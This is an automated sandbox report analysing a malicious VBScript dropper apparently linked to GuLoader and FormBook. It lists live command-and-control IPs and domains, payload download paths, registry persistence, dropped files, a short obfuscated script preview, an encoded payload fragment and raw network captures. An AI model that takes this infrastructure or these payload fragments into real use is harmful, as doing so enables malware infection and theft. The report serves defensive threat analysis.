                                                      www.theplays.shopUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      47.91.88.207
                                                      www.tyaer.comUnited States
                                                      45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                      IP
                                                      127.0.0.1
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1430738
                                                      Start date and time:2024-04-24 06:34:08 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 10m 12s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:16
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Pedido02304024.vbs
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@19/10@5/4
                                                      EGA Information:
                                                      • Successful, ratio: 40%
                                                      HCA Information:
                                                      • Successful, ratio: 81%
                                                      • Number of executed functions: 118
                                                      • Number of non-executed functions: 80
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.56.109.197, 23.56.109.205, 72.21.81.240
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                      • Execution Graph export aborted for target powershell.exe, PID 7556 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7748 because it is empty
                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      TimeTypeDescription
                                                      05:35:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UX0H5LZH3DGH C:\Program Files (x86)\windows mail\wab.exe
                                                      05:36:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UX0H5LZH3DGH C:\Program Files (x86)\windows mail\wab.exe
                                                      06:34:58API Interceptor1x Sleep call for process: wscript.exe modified
                                                      06:35:01API Interceptor118x Sleep call for process: powershell.exe modified
                                                      06:36:35API Interceptor58x Sleep call for process: AtBroker.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      87.121.105.163BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                                                      SCMP_#U547d#U4ee4_004020024001.wsfGet hashmaliciousUnknownBrowse
                                                      • 87.121.105.163/Assumes122.java
                                                      PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 87.121.105.163/kvRPYpXycVNsTooeadG247.bin
                                                      HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 87.121.105.163/dFQwNyOh122.bin
                                                      rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                                                      Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 87.121.105.163/icjFpYDkBweqyeZ252.bin
                                                      PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 87.121.105.163/sssSAXCCU156.bin
                                                      PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 87.121.105.163/vhhJQWfiJN142.bin
                                                      EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 87.121.105.163/YSnpkrCwWalJFSpN146.bin
                                                      Carlispa_Ordine_00401702400417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 87.121.105.163/LvtPvRTpeEEAKbCbj78.bin
                                                      172.67.152.117f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                      • www.theplays.shop/gnbc/
                                                      47.91.88.207PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                          PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                              f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.theplays.shopPO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 104.21.74.5
                                                                f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.152.117
                                                                BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.74.5
                                                                www.tyaer.comPO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 47.91.88.207
                                                                Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 47.91.88.207
                                                                PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 47.91.88.207
                                                                PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 47.91.88.207
                                                                f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                                • 47.91.88.207
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                NET1-ASBGSecuriteInfo.com.Win64.TrojanX-gen.17982.17306.exeGet hashmaliciousAsyncRATBrowse
                                                                • 94.156.8.44
                                                                8awpc7GpMh.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                JU8juw0kr0.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                6WfrjCTjs8.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                mJ4CsuZhyr.elfGet hashmaliciousMiraiBrowse
                                                                • 94.156.79.77
                                                                W46ssx5gcI.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                Y04kc90KjB.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                BN34UR6QlT.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                cG1d8L6E2V.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                Tb0uDdOwyO.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCxzk9TKqNoI.elfGet hashmaliciousMiraiBrowse
                                                                • 147.139.212.194
                                                                b3astmode.x86.elfGet hashmaliciousUnknownBrowse
                                                                • 8.220.214.169
                                                                PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 47.91.88.207
                                                                Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 47.91.88.207
                                                                2.jpg.exeGet hashmaliciousCobaltStrike, Metasploit, ReflectiveLoaderBrowse
                                                                • 8.218.236.5
                                                                http://www.sushi-idea.comGet hashmaliciousUnknownBrowse
                                                                • 47.246.136.185
                                                                SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exeGet hashmaliciousUnknownBrowse
                                                                • 47.243.79.202
                                                                PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 47.91.88.207
                                                                PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 47.91.88.207
                                                                4XAsw9FSr5.elfGet hashmaliciousUnknownBrowse
                                                                • 47.241.21.33
                                                                CLOUDFLARENETUSpurchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                • 104.21.65.24
                                                                BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                                • 172.67.74.152
                                                                3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                • 172.67.139.220
                                                                https://d-wz.info/mygovGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.21.4.29
                                                                mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                • 104.21.65.24
                                                                SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                • 104.22.54.104
                                                                https://wmicrosouab-4ba8.udydzj.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                No context
                                                                No context
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):69993
                                                                Entropy (8bit):7.99584879649948
                                                                Encrypted:true
                                                                SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                Malicious:false
                                                                Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):330
                                                                Entropy (8bit):3.1103303843975674
                                                                Encrypted:false
                                                                SSDEEP:6:kKcUlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:EUlMkPlE99SNxAhUeVLVt
                                                                MD5:BEE9E5B508D994C96F722C17289395B7
                                                                SHA1:B1258612A12C5954E4CFBF14C6E4917C976480DC
                                                                SHA-256:A8F3254332D9B1A68B7F4263CA7CC8AB8CE721A7AD2C750BE1271C3817F73D84
                                                                SHA-512:FA2C891B0F6CBAA31D21A6C12F74219A045A54FB710E9C4D2AB147847A4AA2BC1CFB0165DC391F540865DE72C0302CA5C7E42593738C29BF2FEF0D276443B1F7
                                                                Malicious:false
                                                                Preview:p...... ........w;Q.....(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):11608
                                                                Entropy (8bit):4.886255615007755
                                                                Encrypted:false
                                                                SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                Malicious:false
                                                                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                Malicious:false
                                                                Preview:@...e................................................@..........
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\AtBroker.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):114688
                                                                Entropy (8bit):0.9746603542602881
                                                                Encrypted:false
                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):469320
                                                                Entropy (8bit):5.974066539842778
                                                                Encrypted:false
                                                                SSDEEP:12288:MvfxQPArFigFS1IDb+HmfImIHXO2Yldywvr:Ex6AcIDq4ImI+JDlr
                                                                MD5:94F7CF32CFBA956142A18DCC0540F3F1
                                                                SHA1:66C927CFF88C76D0AE1043859F44D133FF63AE24
                                                                SHA-256:4A166D5061270170C1C8CE38388FBC2D4ABE688706ED2416336D442B02AE94CA
                                                                SHA-512:F896FFFDF60B6D85E3AA64A267404AB092417D73FF91BD05D48366540F58C5D55B30043036BA9CB711B145A39FDF821FA8CA42EF6209E41E44CF44653F38BDE6
                                                                Malicious:false
                                                                Preview:6wJZlesCvCO79DIVAHEBm3EBmwNcJARxAZvrAhktuRiYd/HrAhKLcQGbgelq43/X6wKSousCz/2B8a609xlxAZtxAZvrAgGP6wKx6bo2RIJ4cQGb6wLzoesC7K/rAm2FMcpxAZtxAZuJFAtxAZvrAtz80eLrAjxYcQGbg8EEcQGbcQGbgfnMT5oDfMxxAZvrAvi+i0QkBOsCJ5brAs2DicPrAhPY6wKfHoHDlQHcAXEBm+sCKxq69mdi2esCq51xAZuB8ref73hxAZvrAgCdgepB+I2h6wLP6XEBm3EBm3EBm+sCH8JxAZuLDBDrAkxJcQGbiQwTcQGbcQGbQnEBm+sCiFiB+rT4BAB11usCZ+FxAZuJXCQMcQGbcQGbge0AAwAA6wLcYnEBm4tUJAhxAZvrApzMi3wkBOsCLTlxAZuJ6+sC6s1xAZuBw5wAAADrAp8e6wIKYlPrAktH6wIlV2pAcQGb6wKiwYnrcQGbcQGbx4MAAQAAAJCyA3EBm3EBm4HDAAEAAOsCyiVxAZtT6wJecHEBm4nr6wKOWesCqSqJuwQBAADrAo2UcQGbgcMEAQAA6wLcznEBm1PrAtgFcQGbav9xAZtxAZuDwgXrAqWycQGbMfZxAZvrAi5PMcnrAnvH6wIxqosa6wIMcnEBm0FxAZvrAj66ORwKdfNxAZtxAZtGcQGbcQGbgHwK+7h13+sCxpnrAhd5i0QK/HEBm3EBmynwcQGbcQGb/9JxAZtxAZu6tPgEAOsCrnVxAZsxwOsCfzNxAZuLfCQMcQGbcQGbgTQHOh4Kn3EBm3EBm4PABHEBm+sCIWQ50HXlcQGb6wLKK4n7cQGb6wLCvP/XcQGbcQGbXJvTG+Mm9hbfn+ayuq8IHv4zdy44S4N6g0aW4bKf+9kGboge+8/HQdmfy7aoDBj5u+Rrjv1aB58+jU68vt2PVrtqB5/4wmquXJvLHk4TCv661wgexKRNT0GffpI6ucVyKp/LsYtUDB7T
                                                                File type:ASCII text, with CRLF line terminators
                                                                Entropy (8bit):5.311009630142319
                                                                TrID:
                                                                  File name:Pedido02304024.vbs
                                                                  File size:122'987 bytes
                                                                  MD5:01fcc44530ca64a9bd6ea11bdd55f48a
                                                                  SHA1:8114d39d9c4691782f60affe1116dabc2cd52a96
                                                                  SHA256:fbf530e626999d7d6b6756f91ced542d15801f98c4e1caffcaccdabdec281d83
                                                                  SHA512:71996bdaae485d3f126a3bed33f5edc44cb251c72d15a7aa77ef6f630971814ac69123023efb84f79bb498df6d60cb5adced652b79a9820e1780b0fbc68fc206
                                                                  SSDEEP:3072:SI9rv8awfhzzoNWI1Qe3OjVK3EyQaeCamHaXQyKpgRpYCw+YtavFUJRo2RBGRZ:SWrvWhzzUn1Qe3OjVK3EyQvCamHaXQyZ
                                                                  TLSH:76C3E7A3CF0A36185F8E1FD16C69C95689F741B671212438D9EDE6EC9083FAC91F8C46
                                                                  File Content Preview:....Kiwitrteninformations = Command ......Set upraktisk = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")..On error resume next......on error resume next....Set Lyolytic = upraktisk.ExecQuery("Select * from Win32_Service")........Rem
                                                                  Icon Hash:68d69b8f86ab9a86
                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  04/24/24-06:36:12.028461TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973980192.168.2.447.91.88.207
                                                                  04/24/24-06:36:58.269227TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974380192.168.2.4172.67.152.117
                                                                  04/24/24-06:36:55.590217TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974280192.168.2.4172.67.152.117
                                                                  04/24/24-06:37:03.643573TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974580192.168.2.4172.67.152.117
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 24, 2024 06:35:03.187678099 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:03.487488985 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.487595081 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:03.487893105 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:03.789581060 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790585041 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790627956 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790666103 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790692091 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:03.790726900 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790780067 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790788889 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:03.790817976 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790854931 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790883064 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:03.790894985 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790931940 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.790983915 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:03.791024923 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:03.791486025 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.090784073 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.090828896 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.090867996 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.090895891 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.090905905 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.090941906 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.090977907 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.090979099 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091034889 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091058016 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.091072083 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091108084 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091145992 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091162920 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.091182947 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091200113 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.091223001 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091259003 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091275930 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.091295958 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091335058 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091351032 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.091377020 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091413021 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091442108 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.091450930 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091536999 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091542006 CEST4973180192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:04.091573954 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:04.091626883 CEST4973180192.168.2.487.121.105.163
